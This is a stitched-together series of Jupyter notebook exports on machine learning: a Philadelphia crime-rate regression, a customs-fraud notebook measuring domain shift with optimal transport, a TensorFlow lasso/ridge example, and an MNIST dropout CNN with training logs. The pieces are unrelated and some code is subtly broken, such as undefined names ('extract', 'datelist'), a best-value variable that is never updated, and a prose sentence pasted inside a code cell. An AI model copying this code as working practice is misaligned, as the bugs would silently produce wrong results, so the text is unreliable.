# Plot Zoomed MAE and Loss
#------------------------------------------------
plt.plot(epochs_zoom, mae_zoom, 'r')
plt.plot(epochs_zoom, loss_zoom, 'b')
plt.title('MAE and Loss')
plt.xlabel("Epochs")
plt.ylabel("Accuracy")
plt.legend(["MAE", "Loss"])
plt.figure()
###Output
_____no_output_____ |
regression_mooc/notebooks/PhillyCrime.ipynb | ###Markdown
Load some house value vs. crime rate dataDataset is from Philadelphia, PA and includes average house sales price in a number of neighborhoods. The attributes of each neighborhood we have include the crime rate ('CrimeRate'), miles from Center City ('MilesPhila'), town name ('Name'), and county name ('County').
###Code
sales = pd.read_csv('https://courses.cs.washington.edu/courses/cse416/18sp/notebooks/Philadelphia_Crime_Rate_noNA.csv')
sales.head()
###Output
_____no_output_____
###Markdown
Exploring the data The house price in a town is correlated with the crime rate of that town. Low crime towns tend to be associated with higher house prices and vice versa.
###Code
sales.plot.scatter(x="CrimeRate", y="HousePrice")
###Output
_____no_output_____
###Markdown
Fit the regression model using crime as the feature
###Code
features = sales["CrimeRate"].to_numpy().reshape(-1, 1)
target = sales["HousePrice"].to_numpy().reshape(-1, 1)
crime_model = LinearRegression()
regression = crime_model.fit(features, target)
print(f"coeficients: {regression.coef_}")
print(f"intercept: {regression.intercept_}")
crime_model.predict(features[0].reshape(-1, 1))
###Output
_____no_output_____
###Markdown
Let's see what our fit looks like Matplotlib is a Python plotting library that is also useful for plotting. You can install it with:'pip install matplotlib'
###Code
plt.plot(sales['CrimeRate'],sales['HousePrice'],'.',
sales['CrimeRate'], crime_model.predict(features),'-')
###Output
_____no_output_____
###Markdown
Above: blue dots are original data, green line is the fit from the simple regression. Remove Center City and redo the analysis Center City is the one observation with an extremely high crime rate, yet house prices are not very low. This point does not follow the trend of the rest of the data very well. A question is how much including Center City is influencing our fit on the other datapoints. Let's remove this datapoint and see what happens.
###Code
sales_noCC = sales[sales['MilesPhila'] != 0.0]
sales_noCC.plot.scatter(x="CrimeRate", y="HousePrice")
###Output
_____no_output_____
###Markdown
Refit our simple regression model on this modified dataset:
###Code
features_noCC = sales_noCC["CrimeRate"].to_numpy().reshape(-1, 1)
target_noCC = sales_noCC["HousePrice"].to_numpy().reshape(-1, 1)
crime_model_noCC = LinearRegression()
regression_noCC = crime_model_noCC.fit(features_noCC, target_noCC)
print(f"coeficients: {regression_noCC.coef_}")
print(f"intercept: {regression_noCC.intercept_}")
###Output
coeficients: [[-2288.68942995]]
intercept: [225233.551839]
###Markdown
Look at the fit:
###Code
plt.plot(sales_noCC['CrimeRate'], sales_noCC['HousePrice'], '.',
sales_noCC['CrimeRate'], crime_model_noCC.predict(features_noCC), '-')
###Output
_____no_output_____
###Markdown
Compare coefficients for full-data fit versus no-Center-City fit Visually, the fit seems different, but let's quantify this by examining the estimated coefficients of our original fit and that of the modified dataset with Center City removed.
###Code
print(f"coeficients: {regression.coef_}")
print(f"intercept: {regression.intercept_}")
print(f"coeficients: {regression_noCC.coef_}")
print(f"intercept: {regression_noCC.intercept_}")
###Output
coeficients: [[-2288.68942995]]
intercept: [225233.551839]
###Markdown
Above: We see that for the "no Center City" version, per unit increase in crime, the predicted decrease in house prices is 2,288. In contrast, for the original dataset, the drop is only 576 per unit increase in crime. This is significantly different! High leverage points: Center City is said to be a "high leverage" point because it is at an extreme x value where there are not other observations. As a result, recalling the closed-form solution for simple regression, this point has the *potential* to dramatically change the least squares line since the center of x mass is heavily influenced by this one point and the least squares line will try to fit close to that outlying (in x) point. If a high leverage point follows the trend of the other data, this might not have much effect. On the other hand, if this point somehow differs, it can be strongly influential in the resulting fit. Influential observations: An influential observation is one where the removal of the point significantly changes the fit. As discussed above, high leverage points are good candidates for being influential observations, but need not be. Other observations that are *not* leverage points can also be influential observations (e.g., strongly outlying in y even if x is a typical value). Plotting the two modelsConfirm the above calculations by looking at the plots. The orange line is the model trained removing Center City, and the green line is the model trained on all the data. Notice how much steeper the green line is, since the drop in value is much higher according to this model.
###Code
plt.plot(sales_noCC['CrimeRate'], sales_noCC['HousePrice'], '.',
sales_noCC['CrimeRate'], crime_model.predict(features_noCC), '-',
sales_noCC['CrimeRate'], crime_model_noCC.predict(features_noCC), '-')
###Output
_____no_output_____
###Markdown
Remove high-value outlier neighborhoods and redo analysis Based on the discussion above, a question is whether the outlying high-value towns are strongly influencing the fit. Let's remove them and see what happens.
###Code
# sales_nohighend = sales_noCC[sales_noCC['HousePrice'] < 350000]
# crime_model_nohighend = turicreate.linear_regression.create(
# sales_nohighend,
# target='HousePrice',
# features=['CrimeRate'],
# validation_set=None,
# verbose=False
# )
sales_noHE = sales_noCC[sales_noCC['HousePrice'] < 350000]
features_noHE = sales_noHE["CrimeRate"].to_numpy().reshape(-1, 1)
target_noHE = sales_noHE["HousePrice"].to_numpy().reshape(-1, 1)
crime_model_noHE = LinearRegression()
regression_noHE= crime_model_noHE.fit(features_noHE, target_noHE)
###Output
_____no_output_____
###Markdown
Do the coefficients change much?
###Code
print(f"coeficients: {regression_noCC.coef_}")
print(f"intercept: {regression_noCC.intercept_}")
print(f"coeficients: {regression_noHE.coef_}")
print(f"intercept: {regression_noHE.intercept_}")
###Output
coeficients: [[-1838.56264859]]
intercept: [199098.8526698]
###Markdown
Above: We see that removing the outlying high-value neighborhoods has *some* effect on the fit, but not nearly as much as our high-leverage Center City datapoint. Compare the two modelsConfirm the above calculations by looking at the plots. The orange line is the no high-end model, and the green line is the no-city-center model.
###Code
plt.plot(sales_noHE['CrimeRate'], sales_noHE['HousePrice'], '.',
sales_noHE['CrimeRate'], crime_model_noHE.predict(features_noHE), '-',
sales_noHE['CrimeRate'], crime_model_noCC.predict(features_noHE), '-')
###Output
_____no_output_____ |
analysis/POT_regression_analysis.ipynb | ###Markdown
First, run the command to get the embeddings of the upcoming weeks. We also note this model (to get the embeddings as well as one first model to learn the embeddings). This model will then be used to genereate embeddings for all upcoming weeks.
###Code
day = 20160701
! export CUDA_VISIBLE_DEVICES=3 && python main.py --data real-t --semi_supervised 0 --batch_size 128 --sampling hybrid --subsamplings bATE/DATE --weights 0/1 --mode scratch --train_from 20160101 --test_from $day --test_length 350 --valid_length 30 --initial_inspection_rate 20 --final_inspection_rate 5 --epoch 5 --closs bce --rloss full --save 0 --numweeks 1 --inspection_plan direct_decay
###Output
Experiment starts: 1627093784.306
Namespace(act='relu', ada_lr=0.8, agg='sum', alpha=10, batch_size=128, closs='bce', data='real-t', device='0', devices=['0', '1', '2', '3'], dim=16, epoch=5, final_inspection_rate=5.0, fusion='concat', head_num=4, identifier='1627093784.306', initial_inspection_rate=20.0, inspection_plan='direct_decay', l2=0.01, lr=0.005, mode='scratch', numweeks=1, output='result-1627093784.306', rev_func='log', rloss='full', sampling='hybrid', save=0, semi_supervised=0, ssl_strategy='random', subsamplings='bATE/DATE', test_from='20160701', test_length=350, train_from='20160101', uncertainty='naive', use_self=1, valid_length=30, weights='0/1')
Before masking:
0 373394
1 28939
Name: illicit, dtype: int64
NumExpr defaulting to 6 threads.
After masking:
0.0 74643
1.0 5824
Name: illicit, dtype: int64
Inspection rate for testing periods: [5.]
Data size:
Train labeled: (80467, 41), Train unlabeled: (321866, 41), Valid labeled: (69932, 41), Valid unlabeled: (0, 13), Test: (857886, 41)
Checking label distribution
Training: 0.0780247310531463
Validation: 0.09654253234025872
Testing: 0.08409417455730098
Test episode: #0, Current inspection rate: 5.0
(80467, 41), (857886, 41)
<Hybrid> Querying 42894 (=100.0%) items using the <query_strategies.DATE.DATESampling object at 0x2b997e445898> subsampler
Training XGBoost model...
[11:31:02] WARNING: /tmp/build/80754af9/xgboost-split_1619724447847/work/src/learner.cc:1061: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.
Mode: scratch, Episode: 0
Ranger optimizer loaded.
Gradient Centralization usage = True
GC applied to both conv and fc layers
Training DATE model ...
------------
Validate at epoch 1
CLS loss: 0.3298, REG loss: 0.0257
Checking top 5% suspicious transactions: 3497
Precision: 0.5619, Recall: 0.3191, Revenue: 0.4094
Overall F1:0.4202, AUC:0.6869, F1-top:0.4856
/home/intern/kien/Customs-Fraud-Detection/intermediary/saved_models/DATE-1627093784.306.pkl
------------
Validate at epoch 2
CLS loss: 0.3531, REG loss: 0.0257
Checking top 5% suspicious transactions: 3497
Precision: 0.5633, Recall: 0.3200, Revenue: 0.4181
Overall F1:0.4261, AUC:0.7444, F1-top:0.4907
/home/intern/kien/Customs-Fraud-Detection/intermediary/saved_models/DATE-1627093784.306.pkl
------------
Validate at epoch 3
CLS loss: 0.4252, REG loss: 0.0269
Checking top 5% suspicious transactions: 3497
Precision: 0.5342, Recall: 0.3034, Revenue: 0.3893
Overall F1:0.3978, AUC:0.7231, F1-top:0.4617
------------
Validate at epoch 4
CLS loss: 0.4563, REG loss: 0.0271
Checking top 5% suspicious transactions: 3497
Precision: 0.5325, Recall: 0.3024, Revenue: 0.3894
Overall F1:0.3976, AUC:0.7254, F1-top:0.4609
------------
Validate at epoch 5
CLS loss: 0.4940, REG loss: 0.0269
Checking top 5% suspicious transactions: 3497
Precision: 0.5093, Recall: 0.2893, Revenue: 0.3716
Overall F1:0.3684, AUC:0.7130, F1-top:0.4404
Early stopping...
--------Evaluating DATE model---------
CLS loss: 0.3531, REG loss: 0.0257
CLS loss: 0.3365, REG loss: 0.0250
Checking top 5% suspicious transactions: 42895
Precision: 0.4363, Recall: 0.2812, Revenue: 0.3427
CLS loss: 0.3365, REG loss: 0.0250
Training XGBoost model...
[11:45:56] WARNING: /tmp/build/80754af9/xgboost-split_1619724447847/work/src/learner.cc:1061: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.
Mode: scratch, Episode: 0
Ranger optimizer loaded.
Gradient Centralization usage = True
GC applied to both conv and fc layers
Training DATE model ...
------------
Validate at epoch 1
CLS loss: 0.3001, REG loss: 0.0256
Checking top 5% suspicious transactions: 3497
Precision: 0.5765, Recall: 0.3274, Revenue: 0.4319
Overall F1:0.4448, AUC:0.7602, F1-top:0.5042
/home/intern/kien/Customs-Fraud-Detection/intermediary/saved_models/DATE-1627093784.306.pkl
------------
Validate at epoch 2
CLS loss: 0.3344, REG loss: 0.0257
Checking top 5% suspicious transactions: 3497
Precision: 0.5573, Recall: 0.3166, Revenue: 0.4189
Overall F1:0.4268, AUC:0.7399, F1-top:0.4881
------------
Validate at epoch 3
CLS loss: 0.3973, REG loss: 0.0266
Checking top 5% suspicious transactions: 3497
Precision: 0.5479, Recall: 0.3112, Revenue: 0.4058
Overall F1:0.4105, AUC:0.7376, F1-top:0.4768
------------
Validate at epoch 4
CLS loss: 0.4274, REG loss: 0.0279
Checking top 5% suspicious transactions: 3497
Precision: 0.5413, Recall: 0.3075, Revenue: 0.4013
Overall F1:0.3987, AUC:0.7311, F1-top:0.4713
Early stopping...
--------Evaluating DATE model---------
CLS loss: 0.3001, REG loss: 0.0256
CLS loss: 0.2888, REG loss: 0.0255
Checking top 5% suspicious transactions: 42895
Precision: 0.4447, Recall: 0.2867, Revenue: 0.3504
CLS loss: 0.2888, REG loss: 0.0255
# of unique queried item: 42894, # of queried item: 42894, # of samples to be queried: 42894
--------Evaluating the model---------
Precision: 0.4363, Recall: 0.2812, Revenue: 0.3427
Metrics Active DATE:
[email protected]:0.4363, [email protected]:0.2812 [email protected]:0.3427
Simulation period is over.
Terminating ...
###Markdown
This will store the embeddings in the directory './intermediary/embeddings/embd_0.pickle'These embeddings will be domain-shift calculated between weeks Calculate Domain shifts between weeks
###Code
import pandas as pd
import numpy as np
import torch
import random
import pickle
import ot
with open("./intermediary/embeddings/embd_0.pickle","rb") as f :
processed_data = pickle.load(f)
###Output
_____no_output_____
###Markdown
Matching the datapoints together
###Code
datestart = '16-07-01'
from datetime import datetime, timedelta
date = datetime.strptime(datestart, "%y-%m-%d")
datelist0 = []
for i in range(51):
delta = i * 7
new_date = date + timedelta(days=delta)
datelist0.append(new_date.strftime('%y-%m-%d'))
enddate = datelist0[-1]
data = pd.read_csv('tdata.csv')
data = data[(data['sgd.date'] >= datestart) & (data['sgd.date'] < enddate)]
data.reset_index(drop=True, inplace=True)
###Output
_____no_output_____
###Markdown
Concat weekly data together
###Code
full_data = []
for i in range(len(datelist0) - 1):
data0 = data[(data['sgd.date'] >= datelist0[i]) & (data['sgd.date'] < datelist0[i+1])]
start = data0.index[0]
end = data0.index[-1]
xd = []
for j in range(start, end + 1):
xd.append(processed_data[datelist[j]].reshape(1, -1))
full_data.append(torch.cat(xd, axis=0))
def domain_shift(xs, xt):
M = torch.cdist(xs, xt)
lol = torch.max(M)
M = M/lol
M = M.data.cpu().numpy()
a = [1/xs.shape[0]] * xs.shape[0]
b = [1/xt.shape[0]] * xt.shape[0]
prep = ot.emd2(a, b, M)
return prep * lol
arraycom = []
for i in range(81, len(full_data) - 1):
stack = []
for j in range(60):
indices = torch.tensor(random.sample(range(full_data[i].shape[0]), 500))
indices2 = torch.tensor(random.sample(range(full_data[i+1].shape[0]), 500))
xs = full_data[i][indices]
xt = full_data[i+1][indices2]
print(domain_shift(xs, xt))
stack.append(domain_shift(xs, xt))
xd = np.mean(stack)
print(xd)
arraycom.append(xd)
###Output
_____no_output_____
###Markdown
arraycom will contain domainshifts information through 100 weeks This part is about extracting the best probability of resampling through each week
###Code
def extraction(lol):
for i in lol:
if '[email protected]' in i:
xd = i.split(', ')[0]
value = float(xd.split(':')[1])
return value
probs = []
for i in range(0, len(datelist0) - 2):
highest = 0
day = datelist0[i]
for j in range(1, 10):
ratio = j * 0.1
bratio = 1 - ratio
lol = ! export CUDA_VISIBLE_DEVICES=3 && python main.py --data real-t --semi_supervised 0 --batch_size 128 --sampling hybrid --subsamplings xgb/random --weights $ratio/$bratio --mode scratch --train_from 20160101 --test_from $day --test_length 7 --valid_length 30 --initial_inspection_rate 20 --final_inspection_rate 5 --epoch 5 --closs bce --rloss full --save 0 --numweeks 2 --inspection_plan direct_decay
value = extract(lol)
if value > highest:
smt = bratio
probs.append(smt)
###Output
_____no_output_____
###Markdown
probs should contain the best resampling ratio. Now we come to find the coefficients. First transform the probs result
###Code
news = []
for i in probs:
news.append(np.log(i/(1-i)))
newcom = np.reshape(arraycom, (-1, 1))
from sklearn.linear_model import LinearRegression
reg = LinearRegression()
reg.fit(newcom, news)
reg.coef_
reg.intercept_
###Output
_____no_output_____ |
Lasso_and_Ridge_regression.ipynb | ###Markdown
[View in Colaboratory](https://colab.research.google.com/github/findingfoot/ML_practice-codes/blob/master/Lasso_and_Ridge_regression.ipynb)
###Code
import warnings
warnings.filterwarnings('ignore')
import sys
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn import datasets
from tensorflow.python.framework import ops
regression_type = 'lasso'
ops.reset_default_graph()
sess = tf.Session()
iris = datasets.load_iris()
x_vals = np.array([x[3] for x in iris.data])
y_vals = np.array([y[0] for y in iris.data])
#declare the batch size
batch_size = 25
#define the placeholders
x_data = tf.placeholder(shape = [None,1], dtype=tf.float32)
y_target = tf.placeholder(shape = [None,1], dtype=tf.float32)
#set the seed
seed = 23
np.random.seed(seed)
tf.set_random_seed(seed)
#set the variables for the regression
A = tf.Variable(tf.random_normal(shape = [1,1]))
b = tf.Variable(tf.random_normal(shape = [1,1]))
#model output
model_output = tf.add(tf.matmul(x_data, A), b)
#Loss function
if regression_type == 'lasso':
# Declare Lasso loss function
# Lasso Loss = L2_Loss + heavyside_step,
# Where heavyside_step ~ 0 if A < constant, otherwise ~ 99
lasso_param = tf.constant(0.9)
heavyside_step = tf.truediv(1., tf.add(1., tf.exp(tf.multiply(-50., tf.subtract(A, lasso_param)))))
regularization_param = tf.multiply(heavyside_step, 99.)
loss = tf.add(tf.reduce_mean(tf.square(y_target - model_output)), regularization_param)
elif regression_type == 'ridge':
#Declare the Ridge loss function
# Ridge loss = L2_loss + L2 norm of slope
ridge_param = tf.constant(1.)
ridge_loss = tf.reduce_mean(tf.square(A))
loss = tf.expand_dims(tf.add(tf.reduce_mean(tf.square(y_target - model_output)),
tf.multiply(ridge_param, ridge_loss)), 0)
else:
print('Invalid regression_type parameter value',file=sys.stderr)
#optimizer
my_opt = tf.train.GradientDescentOptimizer(0.001)
train_step = my_opt.minimize(loss)
#initialize the variable
init = tf.global_variables_initializer()
sess.run(init)
#calculate the regression
loss_vec = []
for i in range(1500):
rand_index = np.random.choice(len(x_vals), size = batch_size)
rand_x = np.transpose([x_vals[rand_index]])
rand_y = np.transpose([y_vals[rand_index]])
sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})
temp_loss = sess.run(loss, feed_dict={x_data: rand_x, y_target: rand_y})
#print(temp_loss.shape)
loss_vec.append(temp_loss[0])
if (i+1)%300==0:
print('Step #' + str(i+1) + ' A = ' + str(sess.run(A)) + ' b = ' + str(sess.run(b)))
print('Loss = ' + str(temp_loss))
print('\n')
#get the regression coeeficients
[slope] = sess.run(A)
[intercept] = sess.run(b)
best_fit = []
for i in x_vals:
best_fit.append(slope*i+ intercept)
print(len(loss_vec))
import jupyterthemes as jt
from jupyterthemes import jtplot
jtplot.style(context='talk', fscale=1.4, spines=False, gridlines='--')
plt.plot(x_vals, y_vals, 'go', label = 'Data')
plt.plot(x_vals, best_fit, 'b-', label = 'Best_fit')
plt.legend(loc ='best')
plt.show()
#plot loss over time
plt.plot(loss_vec, 'r-')
plt.title(regression_type + ' Loss per Generation')
plt.xlabel('Generation')
plt.ylabel('Loss')
plt.show()
###Output
_____no_output_____ |
hw3/baseline_dropout.ipynb | ###Markdown
**These code cells were run on google colab with GPU support.**
###Code
import torch
if torch.cuda.is_available():
device = torch.device("cuda:0")
print("GPU")
else:
device = torch.device("cpu")
print("CPU")
###Output
GPU
###Markdown
**Fetching the data**
###Code
from sklearn.datasets import fetch_openml
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
mnist = fetch_openml("mnist_784", version=1)
print(mnist.keys())
###Output
dict_keys(['data', 'target', 'frame', 'feature_names', 'target_names', 'DESCR', 'details', 'categories', 'url'])
###Markdown
**Plotting one example of each class**
###Code
**Out of 70k examples, 10k will be used for test set, and remaining will be used for training and validation.**X = mnist["data"]
Y = mnist["target"]
Y = Y.astype(int)
X=(X/255 - 0.5)*2
fig, ax = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True)
ax = ax.flatten()
for i in range(10):
for x, y in zip(X, Y):
if y==i:
img=np.array(x).reshape((28,28))
ax[i].imshow(img, cmap="Greys")
break
ax[0].set_yticks([])
ax[0].set_xticks([])
plt.tight_layout()
plt.show()
###Output
_____no_output_____
###Markdown
**Out of 70k examples, 10k will be used for test set, and remaining will be used for training and validation.**
###Code
X_train, X_test, Y_train, Y_test = X[:60000], X[60000:], Y[:60000], Y[60000:]
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits=1, test_size=0.1, random_state=42)
for train_index, val_index in split.split(X_train,Y_train):
X_train_strat = X_train[train_index, :]
Y_train_strat = Y_train[train_index]
X_val_strat = X_train[val_index, :]
Y_val_strat = Y_train[val_index]
import torch.nn as nn
import torch.nn.functional as Func
from torch.autograd import Variable
import torch.optim as optim
import torch.utils.data as data
import random
from scipy.io import savemat
import os
from os import path
from sklearn.preprocessing import normalize
from torch.nn.utils import clip_grad_norm_
import torch.nn.parallel.data_parallel as data_parallel
from sklearn.metrics import confusion_matrix
###Output
_____no_output_____
###Markdown
**Extending and overriding methods for our own dataset**
###Code
class mnist_dataset(data.Dataset):
def label_transformer(self, labels):
return labels
def __init__(self, input_data, labels):
input_data = input_data.reshape((len(input_data),1,28,28))
self.feats = input_data
self.labels = self.label_transformer(labels)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
x = self.feats[index]
y = self.labels[index]
return x,y
###Output
_____no_output_____
###Markdown
**Creating dataloader for each of the train, validation, test dataset.**
###Code
class hyperparam:
bs = 100
lr = 0.05
num_epochs = 50
params = {
"batch_size": hyperparam.bs,
"shuffle": True,
"num_workers": 2,
"drop_last": False,
"pin_memory": True
}
train_set = mnist_dataset(X_train_strat, Y_train_strat)
val_set = mnist_dataset(X_val_strat, Y_val_strat)
test_set = mnist_dataset(X_test, Y_test)
training_gen = data.DataLoader(train_set, **params)
val_gen = data.DataLoader(val_set, **params)
test_gen = data.DataLoader(test_set, **params)
###Output
_____no_output_____
###Markdown
**Created a DNN with 2 layers of CNN with 12 filters each and adding two fully connected layers of 100 and 10 neurons respectively.Used Relu activation function, with initial learning rate = 0.05 with glorot initialization.We have added a dropout layer after each hidden layer in the network. The dropout value is taken in the constructor and remains the same for all the dropout layers in the model.**
###Code
from torch.nn import Conv2d, Linear
from torch import flatten
class dropout_cnn(nn.Module):
def glorot_initialize(self, layers):
for layer in layers:
torch.nn.init.xavier_normal_(layer.weight)
torch.nn.init.zeros_(layer.bias)
def __init__(self, dropout_val):
super(dropout_cnn, self).__init__()
self.conv1 = Conv2d(1,12,kernel_size=(3,3), padding = 1)
self.conv2 = Conv2d(12,12,kernel_size=(3,3), padding = 1)
self.fc1 = Linear(588, 100)
self.fc2 = Linear(100, 10)
self.dropout = nn.Dropout(dropout_val)
self.glorot_initialize([self.conv1, self.conv2, self.fc1, self.fc2])
def forward(self, sig):
sig = Func.max_pool2d(Func.relu(self.conv1(sig)), (2, 2))
sig = self.dropout(sig)
sig = Func.max_pool2d(Func.relu(self.conv2(sig)), (2, 2))
sig = self.dropout(sig)
sig = sig.view(-1, 12*7*7)
sig = Func.relu(self.fc1(sig))
sig = self.dropout(sig)
sig = self.fc2(sig)
return sig
# return Func.softmax(sig, dim = 1)
###Output
_____no_output_____
###Markdown
**Model is trained for 50 epochs, after each epochs, printing the validation accuracy. and resulting learning rate after adjusting learning rate by 10% each 10 epochsAlso using early stopping mechanism, which stops the learning if the validation accuracy starts dropping for a consecutive 5 cycles. This is done to prevent overfitting.****We have created three seperate models, each using different dropout value. We will train each of these for 50 epochs with early stopping. We will record how these perform.**
###Code
cnn_models = [dropout_cnn(0.25).to(device), dropout_cnn(0.5).to(device), dropout_cnn(0.75).to(device)]
from tqdm import tqdm
from datetime import datetime
from torch.optim.lr_scheduler import StepLR
tr_avg_loss_list = {0: [], 1:[], 2:[]}
tr_accuracy_list = {0: [], 1:[], 2:[]}
val_avg_loss_list = {0: [], 1:[], 2:[]}
val_accuracy_list = {0: [], 1:[], 2:[]}
print(datetime.now())
for model_num, cnn_model in enumerate(cnn_models):
optimizer = torch.optim.SGD(cnn_model.parameters(), lr = hyperparam.lr, momentum=0.9)
scheduler = StepLR(optimizer, step_size=10, gamma=0.9)
loss = nn.CrossEntropyLoss()
for epoch in range(hyperparam.num_epochs):
print("Epoch:" + str(epoch) + " dropout: " + str((model_num+1)*0.25))
tr_num_correct = 0
tr_num_samples = 0
tr_total_loss = 0
val_num_correct = 0
val_num_samples = 0
val_total_loss = 0
print("Learning rate: " + str(optimizer.param_groups[0]['lr']))
cnn_model.train(True)
with torch.set_grad_enabled(True):
for ind, (local_batch, local_labels) in enumerate(training_gen):
optimizer.zero_grad()
local_batch = local_batch
local_labels = local_labels
local_batch, local_labels = Variable(local_batch).float(), Variable(local_labels)
local_batch = local_batch.to(device)
local_labels = local_labels.to(device)
out1 = cnn_model(local_batch)
ploss = loss(out1, local_labels.long())
tr_total_loss += ploss * hyperparam.bs
ploss.backward()
optimizer.step()
sel_class = torch.argmax(out1, dim=1)
tr_num_correct += sel_class.eq(local_labels).sum().item()
tr_num_samples += hyperparam.bs
tr_avg_loss = tr_total_loss / len(training_gen.dataset)
tr_avg_loss_list[model_num].append(tr_avg_loss)
tr_accuracy = tr_num_correct / len(training_gen.dataset)
tr_accuracy_list[model_num].append(tr_accuracy)
with torch.set_grad_enabled(False):
cnn_model.eval()
for local_batch, local_labels in val_gen:
local_batch = local_batch.float()
local_labels = local_labels.float()
local_batch, local_labels = Variable(local_batch), Variable(local_labels)
local_batch = local_batch.to(device)
local_labels = local_labels.to(device)
out1 = cnn_model(local_batch)
ploss = loss(out1, local_labels.long())
val_total_loss += ploss * hyperparam.bs
sel_class = torch.argmax(out1, dim=1)
val_num_correct += sel_class.eq(local_labels).sum().item()
val_num_samples += local_labels.size(0)
val_avg_loss = val_total_loss / len(val_gen.dataset)
val_avg_loss_list[model_num].append(val_avg_loss)
val_accuracy = val_num_correct / len(val_gen.dataset)
print("Validation accuracy: " + str(val_accuracy))
val_accuracy_list[model_num].append(val_accuracy)
scheduler.step()
if epoch > 10:
if sum([val_accuracy_list[model_num][i] < val_accuracy_list[model_num][i-1] for i in range(epoch-5, epoch)]) == 5:
break
###Output
2021-04-11 08:04:37.031426
Epoch:0 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9748333333333333
Epoch:1 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9815
Epoch:2 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9846666666666667
Epoch:3 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9858333333333333
Epoch:4 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9865
Epoch:5 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.985
Epoch:6 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9848333333333333
Epoch:7 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9868333333333333
Epoch:8 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9866666666666667
Epoch:9 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9858333333333333
Epoch:10 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9865
Epoch:11 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9866666666666667
Epoch:12 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9868333333333333
Epoch:13 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9883333333333333
Epoch:14 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.99
Epoch:15 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9883333333333333
Epoch:16 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9886666666666667
Epoch:17 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9895
Epoch:18 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9886666666666667
Epoch:19 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9876666666666667
Epoch:20 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.988
Epoch:21 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9876666666666667
Epoch:22 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9891666666666666
Epoch:23 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9891666666666666
Epoch:24 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9886666666666667
Epoch:25 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9895
Epoch:26 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9898333333333333
Epoch:27 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9886666666666667
Epoch:28 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9901666666666666
Epoch:29 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9885
Epoch:30 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9873333333333333
Epoch:31 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9888333333333333
Epoch:32 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9896666666666667
Epoch:33 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9905
Epoch:34 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9886666666666667
Epoch:35 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.989
Epoch:36 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9898333333333333
Epoch:37 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9888333333333333
Epoch:38 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9888333333333333
Epoch:39 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9898333333333333
Epoch:40 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9886666666666667
Epoch:41 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9895
Epoch:42 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9896666666666667
Epoch:43 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9908333333333333
Epoch:44 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:45 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:46 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9898333333333333
Epoch:47 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.989
Epoch:48 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:49 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:0 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.955
Epoch:1 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.964
Epoch:2 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9623333333333334
